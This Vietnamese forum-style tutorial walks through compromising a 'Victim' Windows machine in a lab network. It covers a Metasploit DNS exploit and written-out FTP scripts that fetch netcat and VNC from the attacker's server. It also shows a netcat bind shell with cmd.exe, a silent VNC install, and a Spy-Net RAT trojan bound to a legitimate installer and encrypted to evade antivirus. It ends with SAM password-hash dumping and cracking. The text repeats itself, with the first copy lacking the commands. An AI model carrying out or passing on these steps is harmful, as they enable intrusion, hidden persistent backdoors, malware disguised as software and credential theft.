phương pháp hacking máy Victim, nội dung của phương pháp gồm:
Trước khi muốn tấn công vào 1 server hay hệ thống nào đó thì ta phải tiến hành bước Foot Printing và Scanning, nhưng ở đây tôi bỏ qua bước Foot Printing. Scanning giúp ta thu thập thông tin của Victim ( vd: Victim sử dụng OS gì, đang mở những port nào…)
Ở bước Scanning này tôi sử dụng tool có tên là Zenmap (tool này có giao diện GUI) còn Nmap thì dùng bằng command. Giao diện của Zenmap như sau:
Sau khi Scan ta xác định được Server(Victim) có open port 53 (dịch vụ DNS)
Tiếp theo ta dùng Metasploit Framework để scan lỗi DNS.
Sau khi Execute và điền thông tin về OS server, IP … thì ta chiếm dc shell của Victim
Khi chiếm được shell của Victim rồi thì ta có thể add user và thăng quyền …
Để fix lỗi DNS này thì ta vào cách link trong References để xem thông tin về Bug này và download các bản vá lỗi.
Sau khi chiếm được shell của Victim rồi ta dùng command ra lệnh cho victim lên FTP server của ta hay lên web để download file netcat về để dành sau này nếu Victim fix lỗi DNS thì còn back connect lại được. >.<
Từ shell mà chiếm được ở trên ta tạo ra các lệnh mà client sẽ chạy để lên FTP server download netcat về và các command đó ta bỏ vào file tên là netcat.txt:
Sau khi thi hành các lệnh trên thì ta dùng type netcat.txt để xem lại các command mà ta add trong netcat.txt
Download file nc.exe
Tiếp theo khi download file nc.exe về máy rồi thì ta cho netcat listen ở port 1234 để lần sau ta back connect lại máy Victim với port 1234.
Với –n: chỉ dùng địa chỉ IP mà không truy vấn DNS
-vv: hiển thị chi tiết các thông tin về kết nối hiện tại.
-L: buộc Netcat "cố" lắng nghe, nẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-p: port, chỉ định cổng port mà netcat listen.
-e: yêu cầu netcat thi hành chương trình, thường dùng trong chế độ lắng nghe.
=> Sau khi ra lệnh cho Victim listening ở port 1234, từ máy Attacker ta connect tới Victim trên port 1234
Ngoài cách sử dụng netcat ta có thể sử dụng BindPort do T4mQu0c code để back connect
Khi client chạy file BindPort thì client sẽ listening port 9999. Khi này ta dùng netcat để back connect lại máy Victim thông qua port 9999. Đặc điểm của con BindPort này là khi Victim phát hiện ra máy mình đang có process BindPort chạy thì Victim không thể End process được.
Tiếp theo là Remote install VNC lên máy Victim:
Từ shell của Victim ta thi hành command sau để tạo ra file vnc.txt để cho Victim download files vnc trên FTP Server:
Download các file trong vnc folder trên FTP Server:
Cài đặt VNC:
Các file trong vnc folder mà ta đã download về có file tên vnc.reg
Ta sẽ chạy file này để ghi vào trong regedit.
Lệnh merge file vnc.reg như sau:
Sau khi chạy file vnc.reg rồi thì ta install winvnc.exe
Và cuối cùng là start services winvnc lên để có thể dùng VNC connect tới Victim
Cách sử dụng Spy-Net để làm chủ đựợc máy Victim
Soft sử dụng Spy-net [RAT] v1.8.
Chạy file spinet.exe để build ra file Trojan. File này có tác dụng khi client chạy nó thì client sẽ connect về server mà ta đã chỉ định trong quá trình build file.
Ta hoàn toàn làm chủ được máy Victim
Ví dụ: open 1 trang web do ta chỉ định, download/upload file lên máy victim
Để đánh lừa Victim thì ta có thể ghép file Trojan mình vừa build ra với 1 software bất kì
Ví dụ: ta ghép file trojan.exe với file IDM.exe chẳng hạn
Khi client chạy file IDM là trojan.exe nó chạy lun
Ví dụ file trojan của ta bị software antivirus phát hiện thì ta có thể dùng tool mã hóa con trojan đó để bypass software anti-virus.
System Hacking (đọc file SAM crack password ).
Dãy thuật thường dùng là : LM Hash ( WinNT, 98) , NTLM & NTLM v2 (Win2003 trở lên)
Cách dùng đĩa Hiren Boot để ghi đè file SAM không phải là cracking tại vì mình không biết được password hiện tại.
LM Hash tối đa 14 kí tự và được chia làm 2 phần : 7 + 7
NTLM & NTLM v2 (băm chung)
Hiện nay WinXP và Win2003 đều dùng chung 2 dãy thuật là LM Hash và NTLM & NTLM v2.
Có rất nhiều soft hỗ trợ crack password nhưa LC5 và Cain. Ở đây tôi dùng pwdump7 để đọc file SAM và dùng đĩa OPHCrack để tự động dò password (password phải nhỏ hơn 14 kí tự).
Nguồn WhiteHat ( đây là bài viết của mình )
- Khai thác lỗi DNS.
- Dùng Netcat để back connect.
- Remote install VNC lên máy Victim.
- Cách sử dụng Spy-Net để làm chủ đựợc máy Victim.
- System Hacking (đọc file SAM crack password ).
Trước khi muốn tấn công vào 1 server hay hệ thống nào đó thì ta phải tiến hành bước Foot Printing và Scanning, nhưng ở đây tôi bỏ qua bước Foot Printing. Scanning giúp ta thu thập thông tin của Victim ( vd: Victim sử dụng OS gì, đang mở những port nào…)
Ở bước Scanning này tôi sử dụng tool có tên là Zenmap (tool này có giao diện GUI) còn Nmap thì dùng bằng command. Giao diện của Zenmap như sau:
Sau khi Scan ta xác định được Server(Victim) có open port 53 (dịch vụ DNS)
Tiếp theo ta dùng Metasploit Framework để scan lỗi DNS.
Sau khi Execute và điền thông tin về OS server, IP … thì ta chiếm dc shell của Victim
Khi chiếm được shell của Victim rồi thì ta có thể add user và thăng quyền …
Để fix lỗi DNS này thì ta vào cách link trong References để xem thông tin về Bug này và download các bản vá lỗi.
Sau khi chiếm được shell của Victim rồi ta dùng command ra lệnh cho victim lên FTP server của ta hay lên web để download file netcat về để dành sau này nếu Victim fix lỗi DNS thì còn back connect lại được. >.<
Từ shell mà chiếm được ở trên ta tạo ra các lệnh mà client sẽ chạy để lên FTP server download netcat về và các command đó ta bỏ vào file tên là netcat.txt:
Echo open 192.168.3.150>netcat.txt <= connect đến FTP Server Echo administrator>>netcat.txt <= username FTP Echo 123>>netcat.txt <= password FTP Echo binary>>netcat.txt <= File type Echo prompt n>>netcat.txt <= tắt prompt khi download file Echo mget nc.exe>>netcat.txt <= get file nc.exe về Echo quit>>netcat.txt <= thoát FTP |
Sau khi thi hành các lệnh trên thì ta dùng type netcat.txt để xem lại các command mà ta add trong netcat.txt
Download file nc.exe
ftp –s:netcat.txt |
Tiếp theo khi download file nc.exe về máy rồi thì ta cho netcat listen ở port 1234 để lần sau ta back connect lại máy Victim với port 1234.
Nc –nvv –Lp 1234 –e cmd.exe |
Với –n: chỉ dùng địa chỉ IP mà không truy vấn DNS
-vv: hiển thị chi tiết các thông tin về kết nối hiện tại.
-L: buộc Netcat "cố" lắng nghe, nẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-p: port, chỉ định cổng port mà netcat listen.
-e: yêu cầu netcat thi hành chương trình, thường dùng trong chế độ lắng nghe.
=> Sau khi ra lệnh cho Victim listening ở port 1234, từ máy Attacker ta connect tới Victim trên port 1234
Nc 192.168.3.200 1234 |
Ngoài cách sử dụng netcat ta có thể sử dụng BindPort do T4mQu0c code để back connect
Khi client chạy file BindPort thì client sẽ listening port 9999. Khi này ta dùng netcat để back connect lại máy Victim thông qua port 9999. Đặc điểm của con BindPort này là khi Victim phát hiện ra máy mình đang có process BindPort chạy thì Victim không thể End process được.
Tiếp theo là Remote install VNC lên máy Victim:
Từ shell của Victim ta thi hành command sau để tạo ra file vnc.txt để cho Victim download files vnc trên FTP Server:
Echo open 192.168.3.150>vnc.txt Echo administrator>> vnc.txt Echo 123>> vnc.txt Echo binary>> vnc.txt Echo prompt n>> vnc.txt Echo cd vnc>>vnc.txt <= vào thư mục vnc Echo mget *.*>> vnc.txt <= download tất cả các file trong vnc folder Echo quit>> vnc.txt |
Download các file trong vnc folder trên FTP Server:
ftp –s:vnc.txt |
Cài đặt VNC:
Các file trong vnc folder mà ta đã download về có file tên vnc.reg
Ta sẽ chạy file này để ghi vào trong regedit.
Lệnh merge file vnc.reg như sau:
Regedit /s C:\vnc.reg |
Sau khi chạy file vnc.reg rồi thì ta install winvnc.exe
Winvnc -install |
Và cuối cùng là start services winvnc lên để có thể dùng VNC connect tới Victim
Net start winvnc |
Cách sử dụng Spy-Net để làm chủ đựợc máy Victim
Soft sử dụng Spy-net [RAT] v1.8.
Chạy file spinet.exe để build ra file Trojan. File này có tác dụng khi client chạy nó thì client sẽ connect về server mà ta đã chỉ định trong quá trình build file.
Ta hoàn toàn làm chủ được máy Victim
Ví dụ: open 1 trang web do ta chỉ định, download/upload file lên máy victim
Để đánh lừa Victim thì ta có thể ghép file Trojan mình vừa build ra với 1 software bất kì
Ví dụ: ta ghép file trojan.exe với file IDM.exe chẳng hạn
Khi client chạy file IDM là trojan.exe nó chạy lun
Ví dụ file trojan của ta bị software antivirus phát hiện thì ta có thể dùng tool mã hóa con trojan đó để bypass software anti-virus.
System Hacking (đọc file SAM crack password ).
Dãy thuật thường dùng là : LM Hash ( WinNT, 98) , NTLM & NTLM v2 (Win2003 trở lên)
Cách dùng đĩa Hiren Boot để ghi đè file SAM không phải là cracking tại vì mình không biết được password hiện tại.
LM Hash tối đa 14 kí tự và được chia làm 2 phần : 7 + 7
NTLM & NTLM v2 (băm chung)
Hiện nay WinXP và Win2003 đều dùng chung 2 dãy thuật là LM Hash và NTLM & NTLM v2.
Có rất nhiều soft hỗ trợ crack password nhưa LC5 và Cain. Ở đây tôi dùng pwdump7 để đọc file SAM và dùng đĩa OPHCrack để tự động dò password (password phải nhỏ hơn 14 kí tự).
Nguồn WhiteHat ( đây là bài viết của mình )